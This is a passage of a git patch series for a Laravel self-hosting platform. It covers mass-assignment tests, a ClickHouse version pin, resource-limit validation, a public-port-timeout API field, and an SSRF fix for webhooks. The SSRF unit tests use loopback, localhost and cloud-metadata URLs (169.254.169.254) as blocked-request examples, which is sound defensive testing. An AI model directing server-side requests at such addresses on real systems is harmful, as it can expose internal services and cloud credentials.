+ foreach ($dangerousFields as $field) {
+ expect($model->isFillable($field))
+ ->toBeFalse("Model {$modelClass} should not allow mass assignment of '{$field}'");
+ }
+ }
+ });
+
+ test('standalone database models allow mass assignment of config fields', function () {
+ $model = new StandalonePostgresql;
+ expect($model->isFillable('name'))->toBeTrue();
+ expect($model->isFillable('postgres_user'))->toBeTrue();
+ expect($model->isFillable('postgres_password'))->toBeTrue();
+ expect($model->isFillable('image'))->toBeTrue();
+ expect($model->isFillable('limits_memory'))->toBeTrue();
+
+ $model = new StandaloneRedis;
+ expect($model->isFillable('redis_password'))->toBeTrue();
+
+ $model = new StandaloneMysql;
+ expect($model->isFillable('mysql_root_password'))->toBeTrue();
+
+ $model = new StandaloneMongodb;
+ expect($model->isFillable('mongo_initdb_root_username'))->toBeTrue();
+ });
+
+ test('Application fill ignores non-fillable fields', function () {
+ $application = new Application;
+ $application->fill([
+ 'name' => 'test-app',
+ 'environment_id' => 999,
+ 'destination_id' => 999,
+ 'team_id' => 999,
+ 'private_key_id' => 999,
+ ]);
+
+ expect($application->name)->toBe('test-app');
+ expect($application->environment_id)->toBeNull();
+ expect($application->destination_id)->toBeNull();
+ expect($application->private_key_id)->toBeNull();
+ });
+
+ test('Service model blocks mass assignment of relationship IDs', function () {
+ $service = new Service;
+
+ expect($service->isFillable('id'))->toBeFalse();
+ expect($service->isFillable('uuid'))->toBeFalse();
+ expect($service->isFillable('environment_id'))->toBeFalse();
+ expect($service->isFillable('destination_id'))->toBeFalse();
+ expect($service->isFillable('server_id'))->toBeFalse();
+ });
+});
From 0b8c75f8edb12bc9084c1b6cd844643d7ae95701 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sat, 28 Mar 2026 14:23:08 +0100
Subject: [PATCH 100/168] fix(webhooks): add validation to block unsafe webhook
URLs
Prevent server-side request forgery (SSRF) attacks by validating webhook URLs before sending requests. Blocks loopback addresses, cloud metadata endpoints, and localhost URLs.
- Add SafeWebhookUrl rule validation in SendWebhookJob.handle()
- Log warning when unsafe URLs are rejected
- Add comprehensive unit tests covering valid and invalid URL scenarios
---
app/Jobs/SendWebhookJob.php | 16 +++++++
tests/Unit/SendWebhookJobTest.php | 77 +++++++++++++++++++++++++++++++
2 files changed, 93 insertions(+)
create mode 100644 tests/Unit/SendWebhookJobTest.php
diff --git a/app/Jobs/SendWebhookJob.php b/app/Jobs/SendWebhookJob.php
index 607fda3fe..9d2a94606 100644
--- a/app/Jobs/SendWebhookJob.php
+++ b/app/Jobs/SendWebhookJob.php
@@ -9,6 +9,8 @@
use Illuminate\Queue\InteractsWithQueue;
use Illuminate\Queue\SerializesModels;
use Illuminate\Support\Facades\Http;
+use Illuminate\Support\Facades\Log;
+use Illuminate\Support\Facades\Validator;
class SendWebhookJob implements ShouldBeEncrypted, ShouldQueue
{
@@ -40,6 +42,20 @@ public function __construct(
*/
public function handle(): void
{
+ $validator = Validator::make(
+ ['webhook_url' => $this->webhookUrl],
+ ['webhook_url' => ['required', 'url', new \App\Rules\SafeWebhookUrl]]
+ );
+
+ if ($validator->fails()) {
+ Log::warning('SendWebhookJob: blocked unsafe webhook URL', [
+ 'url' => $this->webhookUrl,
+ 'errors' => $validator->errors()->all(),
+ ]);
+
+ return;
+ }
+
if (isDev()) {
ray('Sending webhook notification', [
'url' => $this->webhookUrl,
diff --git a/tests/Unit/SendWebhookJobTest.php b/tests/Unit/SendWebhookJobTest.php
new file mode 100644
index 000000000..688cd3bf2
--- /dev/null
+++ b/tests/Unit/SendWebhookJobTest.php
@@ -0,0 +1,77 @@
+ Http::response('ok', 200)]);
+
+ $job = new SendWebhookJob(
+ payload: ['event' => 'test'],
+ webhookUrl: 'https://example.com/webhook'
+ );
+
+ $job->handle();
+
+ Http::assertSent(function ($request) {
+ return $request->url() === 'https://example.com/webhook';
+ });
+});
+
+it('blocks webhook to loopback address', function () {
+ Http::fake();
+ Log::shouldReceive('warning')
+ ->once()
+ ->withArgs(function ($message) {
+ return str_contains($message, 'blocked unsafe webhook URL');
+ });
+
+ $job = new SendWebhookJob(
+ payload: ['event' => 'test'],
+ webhookUrl: 'http://127.0.0.1/admin'
+ );
+
+ $job->handle();
+
+ Http::assertNothingSent();
+});
+
+it('blocks webhook to cloud metadata endpoint', function () {
+ Http::fake();
+ Log::shouldReceive('warning')
+ ->once()
+ ->withArgs(function ($message) {
+ return str_contains($message, 'blocked unsafe webhook URL');
+ });
+
+ $job = new SendWebhookJob(
+ payload: ['event' => 'test'],
+ webhookUrl: 'http://169.254.169.254/latest/meta-data/'
+ );
+
+ $job->handle();
+
+ Http::assertNothingSent();
+});
+
+it('blocks webhook to localhost', function () {
+ Http::fake();
+ Log::shouldReceive('warning')
+ ->once()
+ ->withArgs(function ($message) {
+ return str_contains($message, 'blocked unsafe webhook URL');
+ });
+
+ $job = new SendWebhookJob(
+ payload: ['event' => 'test'],
+ webhookUrl: 'http://localhost/internal-api'
+ );
+
+ $job->handle();
+
+ Http::assertNothingSent();
+});
From 4213bd5215ec56b385a079df71f4115f768fa5d0 Mon Sep 17 00:00:00 2001
From: Gauthier POGAM--LE MONTAGNER
Date: Sat, 28 Mar 2026 16:14:05 +0100
Subject: [PATCH 101/168] fix(langfuse): pin clickhouse version to avoid error
during clickhouse init
The releases published on 27/03/26 causes Clickhouse to incorrectly
initialize. This prevent the DB from restarting after the initial run.
This pin the version to the most recent version that was working
properly.
---
templates/compose/langfuse.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/templates/compose/langfuse.yaml b/templates/compose/langfuse.yaml
index 2b877307f..b617cec5c 100644
--- a/templates/compose/langfuse.yaml
+++ b/templates/compose/langfuse.yaml
@@ -119,7 +119,7 @@ services:
retries: 10
clickhouse:
- image: clickhouse/clickhouse-server:latest
+ image: clickhouse/clickhouse-server:26.2.4.23
user: "101:101"
environment:
- CLICKHOUSE_DB=${CLICKHOUSE_DB:-default}
From 6197558a38f5afbb74f138be59b52e705c99bf1e Mon Sep 17 00:00:00 2001
From: ShadowArcanist <162910371+ShadowArcanist@users.noreply.github.com>
Date: Sat, 28 Mar 2026 21:08:48 +0530
Subject: [PATCH 102/168] fix(validation): add input validation for resource
limit fields
---
.../Project/Shared/ResourceLimits.php | 44 ++++++++++++++-----
1 file changed, 32 insertions(+), 12 deletions(-)
diff --git a/app/Livewire/Project/Shared/ResourceLimits.php b/app/Livewire/Project/Shared/ResourceLimits.php
index 0b3840289..8a14dc10c 100644
--- a/app/Livewire/Project/Shared/ResourceLimits.php
+++ b/app/Livewire/Project/Shared/ResourceLimits.php
@@ -3,6 +3,7 @@
namespace App\Livewire\Project\Shared;
use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
+use Illuminate\Validation\ValidationException;
use Livewire\Component;
class ResourceLimits extends Component
@@ -16,24 +17,24 @@ class ResourceLimits extends Component
public ?string $limitsCpuset = null;
- public ?int $limitsCpuShares = null;
+ public mixed $limitsCpuShares = null;
public string $limitsMemory;
public string $limitsMemorySwap;
- public int $limitsMemorySwappiness;
+ public mixed $limitsMemorySwappiness = 0;
public string $limitsMemoryReservation;
protected $rules = [
- 'limitsMemory' => 'required|string',
- 'limitsMemorySwap' => 'required|string',
+ 'limitsMemory' => ['required', 'string', 'regex:/^(0|\d+[bBkKmMgG])$/'],
+ 'limitsMemorySwap' => ['required', 'string', 'regex:/^(0|\d+[bBkKmMgG])$/'],
'limitsMemorySwappiness' => 'required|integer|min:0|max:100',
- 'limitsMemoryReservation' => 'required|string',
- 'limitsCpus' => 'nullable',
- 'limitsCpuset' => 'nullable',
- 'limitsCpuShares' => 'nullable',
+ 'limitsMemoryReservation' => ['required', 'string', 'regex:/^(0|\d+[bBkKmMgG])$/'],
+ 'limitsCpus' => ['nullable', 'regex:/^\d*\.?\d+$/'],
+ 'limitsCpuset' => ['nullable', 'regex:/^\d+([,-]\d+)*$/'],
+ 'limitsCpuShares' => 'nullable|integer|min:0',
];
protected $validationAttributes = [
@@ -46,6 +47,19 @@ class ResourceLimits extends Component
'limitsCpuShares' => 'cpu shares',
];
+ protected $messages = [
+ 'limitsMemory.regex' => 'Maximum Memory Limit must be a number followed by a unit (b, k, m, g). Example: 256m, 1g. Use 0 for unlimited.',
+ 'limitsMemorySwap.regex' => 'Maximum Swap Limit must be a number followed by a unit (b, k, m, g). Example: 256m, 1g. Use 0 for unlimited.',
+ 'limitsMemoryReservation.regex' => 'Soft Memory Limit must be a number followed by a unit (b, k, m, g). Example: 256m, 1g. Use 0 for unlimited.',
+ 'limitsCpus.regex' => 'Number of CPUs must be a number (integer or decimal). Example: 0.5, 2.',
+ 'limitsCpuset.regex' => 'CPU sets must be a comma-separated list of CPU numbers or ranges. Example: 0-2 or 0,1,3.',
+ 'limitsMemorySwappiness.integer' => 'Swappiness must be a whole number between 0 and 100.',
+ 'limitsMemorySwappiness.min' => 'Swappiness must be between 0 and 100.',
+ 'limitsMemorySwappiness.max' => 'Swappiness must be between 0 and 100.',
+ 'limitsCpuShares.integer' => 'CPU Weight must be a whole number.',
+ 'limitsCpuShares.min' => 'CPU Weight must be a positive number.',
+ ];
+
/**
* Sync data between component properties and model
*
@@ -57,10 +71,10 @@ private function syncData(bool $toModel = false): void
// Sync TO model (before save)
$this->resource->limits_cpus = $this->limitsCpus;
$this->resource->limits_cpuset = $this->limitsCpuset;
- $this->resource->limits_cpu_shares = $this->limitsCpuShares;
+ $this->resource->limits_cpu_shares = (int) $this->limitsCpuShares;
$this->resource->limits_memory = $this->limitsMemory;
$this->resource->limits_memory_swap = $this->limitsMemorySwap;
- $this->resource->limits_memory_swappiness = $this->limitsMemorySwappiness;
+ $this->resource->limits_memory_swappiness = (int) $this->limitsMemorySwappiness;
$this->resource->limits_memory_reservation = $this->limitsMemoryReservation;
} else {
// Sync FROM model (on load/refresh)
@@ -91,7 +105,7 @@ public function submit()
if (! $this->limitsMemorySwap) {
$this->limitsMemorySwap = '0';
}
- if (is_null($this->limitsMemorySwappiness)) {
+ if ($this->limitsMemorySwappiness === '' || is_null($this->limitsMemorySwappiness)) {
$this->limitsMemorySwappiness = 60;
}
if (! $this->limitsMemoryReservation) {
@@ -103,7 +117,7 @@ public function submit()
if ($this->limitsCpuset === '') {
$this->limitsCpuset = null;
}
- if (is_null($this->limitsCpuShares)) {
+ if ($this->limitsCpuShares === '' || is_null($this->limitsCpuShares)) {
$this->limitsCpuShares = 1024;
}
@@ -112,6 +126,12 @@ public function submit()
$this->syncData(true);
$this->resource->save();
$this->dispatch('success', 'Resource limits updated.');
+ } catch (ValidationException $e) {
+ foreach ($e->validator->errors()->all() as $message) {
+ $this->dispatch('error', $message);
+ }
+
+ return;
} catch (\Throwable $e) {
return handleError($e, $this);
}
From 72118d61f936bf475f8a71530aa70cf3083e50d9 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Sat, 28 Mar 2026 17:08:02 +0100
Subject: [PATCH 103/168] feat(databases): add public port timeout
configuration
Add support for configuring public port timeout on databases via API:
- Add public_port_timeout field to schema documentation with 3600s default
- Add validation rules (integer|nullable|min:1)
- Update all database type configurations to support the field
- Add comprehensive test coverage for the feature
---
.../Controllers/Api/DatabasesController.php | 47 +++---
openapi.json | 36 +++++
openapi.yaml | 27 ++++
.../DatabasePublicPortTimeoutApiTest.php | 147 ++++++++++++++++++
4 files changed, 239 insertions(+), 18 deletions(-)
create mode 100644 tests/Feature/DatabasePublicPortTimeoutApiTest.php
diff --git a/app/Http/Controllers/Api/DatabasesController.php b/app/Http/Controllers/Api/DatabasesController.php
index 660ed4529..33d875758 100644
--- a/app/Http/Controllers/Api/DatabasesController.php
+++ b/app/Http/Controllers/Api/DatabasesController.php
@@ -264,6 +264,7 @@ public function database_by_uuid(Request $request)
'image' => ['type' => 'string', 'description' => 'Docker Image of the database'],
'is_public' => ['type' => 'boolean', 'description' => 'Is the database public?'],
'public_port' => ['type' => 'integer', 'description' => 'Public port of the database'],
+ 'public_port_timeout' => ['type' => 'integer', 'description' => 'Public port timeout in seconds (default: 3600)'],
'limits_memory' => ['type' => 'string', 'description' => 'Memory limit of the database'],
'limits_memory_swap' => ['type' => 'string', 'description' => 'Memory swap limit of the database'],
'limits_memory_swappiness' => ['type' => 'integer', 'description' => 'Memory swappiness of the database'],
@@ -327,7 +328,7 @@ public function database_by_uuid(Request $request)
)]
public function update_by_uuid(Request $request)
{
- $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'postgres_user', 'postgres_password', 'postgres_db', 'postgres_initdb_args', 'postgres_host_auth_method', 'postgres_conf', 'clickhouse_admin_user', 'clickhouse_admin_password', 'dragonfly_password', 'redis_password', 'redis_conf', 'keydb_password', 'keydb_conf', 'mariadb_conf', 'mariadb_root_password', 'mariadb_user', 'mariadb_password', 'mariadb_database', 'mongo_conf', 'mongo_initdb_root_username', 'mongo_initdb_root_password', 'mongo_initdb_database', 'mysql_root_password', 'mysql_password', 'mysql_user', 'mysql_database', 'mysql_conf'];
+ $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'postgres_user', 'postgres_password', 'postgres_db', 'postgres_initdb_args', 'postgres_host_auth_method', 'postgres_conf', 'clickhouse_admin_user', 'clickhouse_admin_password', 'dragonfly_password', 'redis_password', 'redis_conf', 'keydb_password', 'keydb_conf', 'mariadb_conf', 'mariadb_root_password', 'mariadb_user', 'mariadb_password', 'mariadb_database', 'mongo_conf', 'mongo_initdb_root_username', 'mongo_initdb_root_password', 'mongo_initdb_database', 'mysql_root_password', 'mysql_password', 'mysql_user', 'mysql_database', 'mysql_conf'];
$teamId = getTeamIdFromToken();
if (is_null($teamId)) {
return invalidTokenResponse();
@@ -344,6 +345,7 @@ public function update_by_uuid(Request $request)
'image' => 'string',
'is_public' => 'boolean',
'public_port' => 'numeric|nullable',
+ 'public_port_timeout' => 'integer|nullable|min:1',
'limits_memory' => 'string',
'limits_memory_swap' => 'string',
'limits_memory_swappiness' => 'numeric',
@@ -375,7 +377,7 @@ public function update_by_uuid(Request $request)
}
switch ($database->type()) {
case 'standalone-postgresql':
- $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'postgres_user', 'postgres_password', 'postgres_db', 'postgres_initdb_args', 'postgres_host_auth_method', 'postgres_conf'];
+ $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'postgres_user', 'postgres_password', 'postgres_db', 'postgres_initdb_args', 'postgres_host_auth_method', 'postgres_conf'];
$validator = customApiValidator($request->all(), [
'postgres_user' => 'string',
'postgres_password' => 'string',
@@ -406,20 +408,20 @@ public function update_by_uuid(Request $request)
}
break;
case 'standalone-clickhouse':
- $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'clickhouse_admin_user', 'clickhouse_admin_password'];
+ $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'clickhouse_admin_user', 'clickhouse_admin_password'];
$validator = customApiValidator($request->all(), [
'clickhouse_admin_user' => 'string',
'clickhouse_admin_password' => 'string',
]);
break;
case 'standalone-dragonfly':
- $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'dragonfly_password'];
+ $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'dragonfly_password'];
$validator = customApiValidator($request->all(), [
'dragonfly_password' => 'string',
]);
break;
case 'standalone-redis':
- $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'redis_password', 'redis_conf'];
+ $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'redis_password', 'redis_conf'];
$validator = customApiValidator($request->all(), [
'redis_password' => 'string',
'redis_conf' => 'string',
@@ -446,7 +448,7 @@ public function update_by_uuid(Request $request)
}
break;
case 'standalone-keydb':
- $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'keydb_password', 'keydb_conf'];
+ $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'keydb_password', 'keydb_conf'];
$validator = customApiValidator($request->all(), [
'keydb_password' => 'string',
'keydb_conf' => 'string',
@@ -473,7 +475,7 @@ public function update_by_uuid(Request $request)
}
break;
case 'standalone-mariadb':
- $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'mariadb_conf', 'mariadb_root_password', 'mariadb_user', 'mariadb_password', 'mariadb_database'];
+ $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'mariadb_conf', 'mariadb_root_password', 'mariadb_user', 'mariadb_password', 'mariadb_database'];
$validator = customApiValidator($request->all(), [
'mariadb_conf' => 'string',
'mariadb_root_password' => 'string',
@@ -503,7 +505,7 @@ public function update_by_uuid(Request $request)
}
break;
case 'standalone-mongodb':
- $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'mongo_conf', 'mongo_initdb_root_username', 'mongo_initdb_root_password', 'mongo_initdb_database'];
+ $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'mongo_conf', 'mongo_initdb_root_username', 'mongo_initdb_root_password', 'mongo_initdb_database'];
$validator = customApiValidator($request->all(), [
'mongo_conf' => 'string',
'mongo_initdb_root_username' => 'string',
@@ -533,7 +535,7 @@ public function update_by_uuid(Request $request)
break;
case 'standalone-mysql':
- $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'mysql_root_password', 'mysql_password', 'mysql_user', 'mysql_database', 'mysql_conf'];
+ $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'mysql_root_password', 'mysql_password', 'mysql_user', 'mysql_database', 'mysql_conf'];
$validator = customApiValidator($request->all(), [
'mysql_root_password' => 'string',
'mysql_password' => 'string',
@@ -1068,6 +1070,7 @@ public function update_backup(Request $request)
'image' => ['type' => 'string', 'description' => 'Docker Image of the database'],
'is_public' => ['type' => 'boolean', 'description' => 'Is the database public?'],
'public_port' => ['type' => 'integer', 'description' => 'Public port of the database'],
+ 'public_port_timeout' => ['type' => 'integer', 'description' => 'Public port timeout in seconds (default: 3600)'],
'limits_memory' => ['type' => 'string', 'description' => 'Memory limit of the database'],
'limits_memory_swap' => ['type' => 'string', 'description' => 'Memory swap limit of the database'],
'limits_memory_swappiness' => ['type' => 'integer', 'description' => 'Memory swappiness of the database'],
@@ -1135,6 +1138,7 @@ public function create_database_postgresql(Request $request)
'image' => ['type' => 'string', 'description' => 'Docker Image of the database'],
'is_public' => ['type' => 'boolean', 'description' => 'Is the database public?'],
'public_port' => ['type' => 'integer', 'description' => 'Public port of the database'],
+ 'public_port_timeout' => ['type' => 'integer', 'description' => 'Public port timeout in seconds (default: 3600)'],
'limits_memory' => ['type' => 'string', 'description' => 'Memory limit of the database'],
'limits_memory_swap' => ['type' => 'string', 'description' => 'Memory swap limit of the database'],
'limits_memory_swappiness' => ['type' => 'integer', 'description' => 'Memory swappiness of the database'],
@@ -1201,6 +1205,7 @@ public function create_database_clickhouse(Request $request)
'image' => ['type' => 'string', 'description' => 'Docker Image of the database'],
'is_public' => ['type' => 'boolean', 'description' => 'Is the database public?'],
'public_port' => ['type' => 'integer', 'description' => 'Public port of the database'],
+ 'public_port_timeout' => ['type' => 'integer', 'description' => 'Public port timeout in seconds (default: 3600)'],
'limits_memory' => ['type' => 'string', 'description' => 'Memory limit of the database'],
'limits_memory_swap' => ['type' => 'string', 'description' => 'Memory swap limit of the database'],
'limits_memory_swappiness' => ['type' => 'integer', 'description' => 'Memory swappiness of the database'],
@@ -1268,6 +1273,7 @@ public function create_database_dragonfly(Request $request)
'image' => ['type' => 'string', 'description' => 'Docker Image of the database'],
'is_public' => ['type' => 'boolean', 'description' => 'Is the database public?'],
'public_port' => ['type' => 'integer', 'description' => 'Public port of the database'],
+ 'public_port_timeout' => ['type' => 'integer', 'description' => 'Public port timeout in seconds (default: 3600)'],
'limits_memory' => ['type' => 'string', 'description' => 'Memory limit of the database'],
'limits_memory_swap' => ['type' => 'string', 'description' => 'Memory swap limit of the database'],
'limits_memory_swappiness' => ['type' => 'integer', 'description' => 'Memory swappiness of the database'],
@@ -1335,6 +1341,7 @@ public function create_database_redis(Request $request)
'image' => ['type' => 'string', 'description' => 'Docker Image of the database'],
'is_public' => ['type' => 'boolean', 'description' => 'Is the database public?'],
'public_port' => ['type' => 'integer', 'description' => 'Public port of the database'],
+ 'public_port_timeout' => ['type' => 'integer', 'description' => 'Public port timeout in seconds (default: 3600)'],
'limits_memory' => ['type' => 'string', 'description' => 'Memory limit of the database'],
'limits_memory_swap' => ['type' => 'string', 'description' => 'Memory swap limit of the database'],
'limits_memory_swappiness' => ['type' => 'integer', 'description' => 'Memory swappiness of the database'],
@@ -1405,6 +1412,7 @@ public function create_database_keydb(Request $request)
'image' => ['type' => 'string', 'description' => 'Docker Image of the database'],
'is_public' => ['type' => 'boolean', 'description' => 'Is the database public?'],
'public_port' => ['type' => 'integer', 'description' => 'Public port of the database'],
+ 'public_port_timeout' => ['type' => 'integer', 'description' => 'Public port timeout in seconds (default: 3600)'],
'limits_memory' => ['type' => 'string', 'description' => 'Memory limit of the database'],
'limits_memory_swap' => ['type' => 'string', 'description' => 'Memory swap limit of the database'],
'limits_memory_swappiness' => ['type' => 'integer', 'description' => 'Memory swappiness of the database'],
@@ -1475,6 +1483,7 @@ public function create_database_mariadb(Request $request)
'image' => ['type' => 'string', 'description' => 'Docker Image of the database'],
'is_public' => ['type' => 'boolean', 'description' => 'Is the database public?'],
'public_port' => ['type' => 'integer', 'description' => 'Public port of the database'],
+ 'public_port_timeout' => ['type' => 'integer', 'description' => 'Public port timeout in seconds (default: 3600)'],
'limits_memory' => ['type' => 'string', 'description' => 'Memory limit of the database'],
'limits_memory_swap' => ['type' => 'string', 'description' => 'Memory swap limit of the database'],
'limits_memory_swappiness' => ['type' => 'integer', 'description' => 'Memory swappiness of the database'],
@@ -1542,6 +1551,7 @@ public function create_database_mysql(Request $request)
'image' => ['type' => 'string', 'description' => 'Docker Image of the database'],
'is_public' => ['type' => 'boolean', 'description' => 'Is the database public?'],
'public_port' => ['type' => 'integer', 'description' => 'Public port of the database'],
+ 'public_port_timeout' => ['type' => 'integer', 'description' => 'Public port timeout in seconds (default: 3600)'],
'limits_memory' => ['type' => 'string', 'description' => 'Memory limit of the database'],
'limits_memory_swap' => ['type' => 'string', 'description' => 'Memory swap limit of the database'],
'limits_memory_swappiness' => ['type' => 'integer', 'description' => 'Memory swappiness of the database'],
@@ -1580,7 +1590,7 @@ public function create_database_mongodb(Request $request)
public function create_database(Request $request, NewDatabaseTypes $type)
{
- $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'postgres_user', 'postgres_password', 'postgres_db', 'postgres_initdb_args', 'postgres_host_auth_method', 'postgres_conf', 'clickhouse_admin_user', 'clickhouse_admin_password', 'dragonfly_password', 'redis_password', 'redis_conf', 'keydb_password', 'keydb_conf', 'mariadb_conf', 'mariadb_root_password', 'mariadb_user', 'mariadb_password', 'mariadb_database', 'mongo_conf', 'mongo_initdb_root_username', 'mongo_initdb_root_password', 'mongo_initdb_database', 'mysql_root_password', 'mysql_password', 'mysql_user', 'mysql_database', 'mysql_conf'];
+ $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'postgres_user', 'postgres_password', 'postgres_db', 'postgres_initdb_args', 'postgres_host_auth_method', 'postgres_conf', 'clickhouse_admin_user', 'clickhouse_admin_password', 'dragonfly_password', 'redis_password', 'redis_conf', 'keydb_password', 'keydb_conf', 'mariadb_conf', 'mariadb_root_password', 'mariadb_user', 'mariadb_password', 'mariadb_database', 'mongo_conf', 'mongo_initdb_root_username', 'mongo_initdb_root_password', 'mongo_initdb_database', 'mysql_root_password', 'mysql_password', 'mysql_user', 'mysql_database', 'mysql_conf'];
$teamId = getTeamIdFromToken();
if (is_null($teamId)) {
@@ -1670,6 +1680,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
'destination_uuid' => 'string',
'is_public' => 'boolean',
'public_port' => 'numeric|nullable',
+ 'public_port_timeout' => 'integer|nullable|min:1',
'limits_memory' => 'string',
'limits_memory_swap' => 'string',
'limits_memory_swappiness' => 'numeric',
@@ -1696,7 +1707,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
}
}
if ($type === NewDatabaseTypes::POSTGRESQL) {
- $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'postgres_user', 'postgres_password', 'postgres_db', 'postgres_initdb_args', 'postgres_host_auth_method', 'postgres_conf'];
+ $allowedFields = ['name', 'description', 'image', 'public_port', 'public_port_timeout', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'postgres_user', 'postgres_password', 'postgres_db', 'postgres_initdb_args', 'postgres_host_auth_method', 'postgres_conf'];
$validator = customApiValidator($request->all(), [
'postgres_user' => 'string',
'postgres_password' => 'string',
@@ -1755,7 +1766,7 @@ public function create_database(Request $request, NewDatabaseTypes $type)
return response()->json(serializeApiResponse($payload))->setStatusCode(201);
} elseif ($type === NewDatabaseTypes::MARIADB) {
- $allowedFields = ['name', 'description', 'image', 'public_port', 'is_public', 'project_uuid', 'environment_name', 'environment_uuid', 'server_uuid', 'destination_uuid', 'instant_deploy', 'limits_memory', 'limits_memory_swap', 'limits_memory_swappiness', 'limits_memory_reservation', 'limits_cpus', 'limits_cpuset', 'limits_cpu_shares', 'mariadb_conf', 'mariadb_root_password', 'mariadb_user', 'mariadb_password', 'mariadb_database'];
